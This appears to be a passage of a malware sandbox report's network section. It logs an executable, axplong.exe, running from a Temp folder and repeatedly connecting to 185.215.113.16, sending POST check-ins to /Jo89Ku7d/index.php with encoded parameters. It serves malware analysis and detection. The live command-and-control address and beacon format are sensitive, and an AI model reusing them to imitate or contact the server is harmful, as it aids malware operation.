                      Jul 26, 2024 13:44:39.899859905 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:39.910048008 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:39.914930105 CEST8053677185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:40.159702063 CEST8053677185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:40.159833908 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:40.274477005 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:40.275131941 CEST5367880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:40.281003952 CEST8053678185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:40.281085968 CEST5367880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:40.281171083 CEST5367880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:40.282176971 CEST8053677185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:40.282232046 CEST5367780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:40.286124945 CEST8053678185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:41.152069092 CEST8053678185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:41.152147055 CEST5367880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:41.152724981 CEST5367880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:41.157582045 CEST8053678185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:41.403776884 CEST8053678185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:41.403883934 CEST5367880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:41.509028912 CEST5367880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:41.509393930 CEST5367980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:41.521049976 CEST8053679185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:41.521167040 CEST5367980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:41.521389008 CEST5367980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:41.522295952 CEST8053678185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:41.522357941 CEST5367880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:41.531063080 CEST8053679185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:42.298847914 CEST8053679185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:42.298947096 CEST5367980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:42.311791897 CEST5367980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:42.316721916 CEST8053679185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:42.595769882 CEST8053679185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:42.595911026 CEST5367980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:42.712197065 CEST5367980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:42.712697983 CEST5368080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:42.717710018 CEST8053680185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:42.717812061 CEST5368080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:42.717983961 CEST5368080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:42.718413115 CEST8053679185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:42.718462944 CEST5367980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:42.723272085 CEST8053680185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:43.471055031 CEST8053680185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:43.471260071 CEST5368080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:43.471693993 CEST5368080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:43.483728886 CEST8053680185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:43.719747066 CEST8053680185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:43.719825983 CEST5368080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:43.821517944 CEST5368080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:43.821743011 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:43.826786995 CEST8053681185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:43.827101946 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:43.827101946 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:43.828783035 CEST8053680185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:43.828852892 CEST5368080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:43.832459927 CEST8053681185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:44.988388062 CEST8053681185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:44.988495111 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:44.989340067 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:44.992512941 CEST8053681185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:44.992593050 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:44.996732950 CEST8053681185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:45.238414049 CEST8053681185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:45.238604069 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:45.352643013 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:45.352967978 CEST5368280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:45.368278027 CEST8053682185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:45.368379116 CEST5368280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:45.368541002 CEST5368280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:45.369811058 CEST8053681185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:45.369867086 CEST5368180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:45.374638081 CEST8053682185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:46.131669044 CEST8053682185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:46.131901026 CEST5368280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:46.134480953 CEST5368280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:46.139722109 CEST8053682185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:46.388288021 CEST8053682185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:46.388365984 CEST5368280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:46.496640921 CEST5368280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:46.497060061 CEST5368380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:46.502096891 CEST8053683185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:46.502124071 CEST8053682185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:46.502185106 CEST5368380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:46.502212048 CEST5368280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:46.504507065 CEST5368380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:46.509442091 CEST8053683185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:47.274538040 CEST8053683185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:47.274635077 CEST5368380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:47.275854111 CEST5368380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:47.280828953 CEST8053683185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:47.675021887 CEST8053683185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:47.675124884 CEST5368380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:47.790594101 CEST5368380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:47.790870905 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:47.796150923 CEST8053684185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:47.796272039 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:47.796544075 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:47.796544075 CEST8053683185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:47.796616077 CEST5368380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:47.801727057 CEST8053684185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:48.588161945 CEST8053684185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:48.588242054 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:48.588973045 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:48.595315933 CEST8053684185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:48.843326092 CEST8053684185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:48.843390942 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:48.946366072 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:48.946753979 CEST5368580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:49.258285999 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:49.353779078 CEST8053685185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:49.353792906 CEST8053684185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:49.353801012 CEST8053684185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:49.353890896 CEST5368480192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:49.353888988 CEST5368580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:49.354079008 CEST5368580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:49.359591961 CEST8053685185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:50.146931887 CEST8053685185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:50.147139072 CEST5368580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:50.147691965 CEST5368580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:50.153141022 CEST8053685185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:50.400048018 CEST8053685185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:50.400151014 CEST5368580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:50.509303093 CEST5368580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:50.509617090 CEST5368680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:50.516463041 CEST8053686185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:50.516625881 CEST5368680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:50.516756058 CEST5368680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:50.516990900 CEST8053685185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:50.517050028 CEST5368580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:50.524108887 CEST8053686185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:51.277060032 CEST8053686185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:51.277177095 CEST5368680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:51.277800083 CEST5368680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:51.283869982 CEST8053686185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:51.527635098 CEST8053686185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:51.527853012 CEST5368680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:51.633936882 CEST5368680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:51.634130955 CEST5368780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:51.640032053 CEST8053687185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:51.640110970 CEST5368780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:51.640239000 CEST5368780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:51.645164013 CEST8053686185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:51.645229101 CEST5368680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:51.646707058 CEST8053687185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:52.413220882 CEST8053687185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:52.413317919 CEST5368780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:52.415894032 CEST5368780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:52.421649933 CEST8053687185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:52.675721884 CEST8053687185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:52.675801992 CEST5368780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:52.790133953 CEST5368780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:52.790448904 CEST5368880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:52.796828985 CEST8053687185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:52.796840906 CEST8053688185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:52.796915054 CEST5368780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:52.796956062 CEST5368880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:52.797126055 CEST5368880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:52.802320004 CEST8053688185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:53.648627043 CEST8053688185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:53.648719072 CEST5368880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:53.649533033 CEST5368880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:53.654472113 CEST8053688185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:53.899780035 CEST8053688185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:53.899864912 CEST5368880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:54.019191027 CEST5368880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:54.019510031 CEST5368980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:54.031595945 CEST8053689185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:54.031699896 CEST5368980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:54.031814098 CEST5368980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:54.034589052 CEST8053688185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:54.034646034 CEST5368880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:54.037064075 CEST8053689185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:54.834448099 CEST8053689185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:54.834709883 CEST5368980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:54.835484982 CEST5368980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:54.840264082 CEST8053689185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:55.089221001 CEST8053689185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:55.089366913 CEST5368980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:55.196723938 CEST5368980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:55.197180033 CEST5369080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:55.202272892 CEST8053690185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:55.202348948 CEST5369080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:55.202594042 CEST5369080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:55.202991009 CEST8053689185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:55.203047991 CEST5368980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:55.207623005 CEST8053690185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:55.991609097 CEST8053690185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:55.991710901 CEST5369080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:55.992436886 CEST5369080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:55.997417927 CEST8053690185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:56.243362904 CEST8053690185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:56.243563890 CEST5369080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:56.352696896 CEST5369080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:56.352972031 CEST5369180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:56.359313965 CEST8053691185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:56.359385967 CEST5369180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:56.359525919 CEST5369180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:56.360703945 CEST8053690185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:56.360770941 CEST5369080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:56.365562916 CEST8053691185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:57.111125946 CEST8053691185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:57.111254930 CEST5369180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:57.127521038 CEST5369180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:57.132946014 CEST8053691185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:57.378264904 CEST8053691185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:57.378582954 CEST5369180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:57.493232012 CEST5369180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:57.493546963 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:57.498478889 CEST8053692185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:57.498732090 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:57.498809099 CEST8053691185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:57.498857975 CEST5369180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:57.498933077 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:57.503695965 CEST8053692185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:58.280455112 CEST8053692185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:58.282524109 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:58.283097982 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:58.288019896 CEST8053692185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:58.617841959 CEST8053692185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:58.617968082 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:58.727792025 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:58.728096962 CEST5369380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:59.039542913 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:59.145889044 CEST8053693185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:59.145903111 CEST8053692185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:59.145911932 CEST8053692185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:59.146056890 CEST5369380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:59.146164894 CEST5369280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:59.146281958 CEST5369380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:59.151186943 CEST8053693185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:59.912614107 CEST8053693185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:59.912687063 CEST5369380192.168.2.5185.215.113.16

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 26, 2024 13:43:28.501430035 CEST5360184162.159.36.2192.168.2.5
                      Jul 26, 2024 13:43:29.034353018 CEST5667253192.168.2.51.1.1.1
                      Jul 26, 2024 13:43:29.042918921 CEST53566721.1.1.1192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 26, 2024 13:43:29.034353018 CEST192.168.2.51.1.1.10x8571Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 26, 2024 13:43:29.042918921 CEST1.1.1.1192.168.2.50x8571Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • 185.215.113.16

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.553647185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:02.262164116 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:03.059106112 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:03.061624050 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:03.366684914 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.553648185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:03.522540092 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:04.280569077 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:04.281440020 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:04.540323019 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.553649185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:04.656502008 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:05.670748949 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:05.672177076 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:05.672499895 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:05.920926094 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.553650185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:06.032423973 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:06.813628912 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:06.814331055 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
